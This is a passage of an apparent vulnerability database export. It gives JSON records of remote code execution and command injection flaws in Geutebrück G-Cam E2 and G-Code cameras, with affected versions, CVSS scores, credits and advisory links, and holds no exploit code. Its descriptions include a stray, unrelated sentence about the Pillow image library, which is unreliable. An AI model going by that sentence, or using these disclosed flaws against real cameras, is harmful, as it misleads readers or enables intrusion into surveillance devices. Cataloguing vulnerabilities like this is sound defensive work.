              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in G-Cam E2 and G-Code made by GEUTEBRUCK",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0599

    Vulnerability from variot - Updated: 2025-01-30 19:58

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the name parameter, which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in G-Cam E2 and G-Code, provided by GEUTEBRUCK: * Lack of authentication for important features (CWE-306) - CVE-2021-33543; * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554; * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. There is currently no information about this vulnerability; please follow CNNVD or manufacturer announcements.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0599",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33546",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33546",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33546",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33546",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33546",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2091",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-33546",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-33546"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the name parameter, which may allow an attacker to remotely execute arbitrary code. The G-Cam E2 and G-Code products provided by GEUTEBRUCK contain the following multiple vulnerabilities. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33546"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33546",
            "trust": 2.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33546",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33546"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "id": "VAR-202109-0599",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T19:58:42.398000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK\u2019s web portal (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2  and  G-Code Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=158071"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.7,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33546"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/121.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33546"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33546"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33546"
          },
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          },
          {
            "date": "2021-09-13T18:15:22.290000",
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-27T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33546"
          },
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          },
          {
            "date": "2023-11-07T03:35:51.630000",
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in GEUTEBRUCK G-Cam E2 and G-Code",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201812-0470

    Vulnerability from variot - Updated: 2025-01-30 19:51

    In Geutebrueck GmbH E2 Camera Series versions prior to 1.12.0.25, the DDNS configuration (in the Network Configuration panel) is vulnerable to OS command injection as root. The Geutebrück E2 Camera Series is an E2 series webcam from Geutebrück, Germany. A remote attacker can exploit this vulnerability to inject operating system commands with root privileges. Geutebrück GmbH E2 Series IP Cameras are prone to an OS command-injection vulnerability.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201812-0470",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam\\/efd-2251",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam\\/ewpc-2275",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-2251",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ewpc-2275",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "e2 camera series",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "e2 series camera",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebr\u00fcck",
            "version": "1.12"
          },
          {
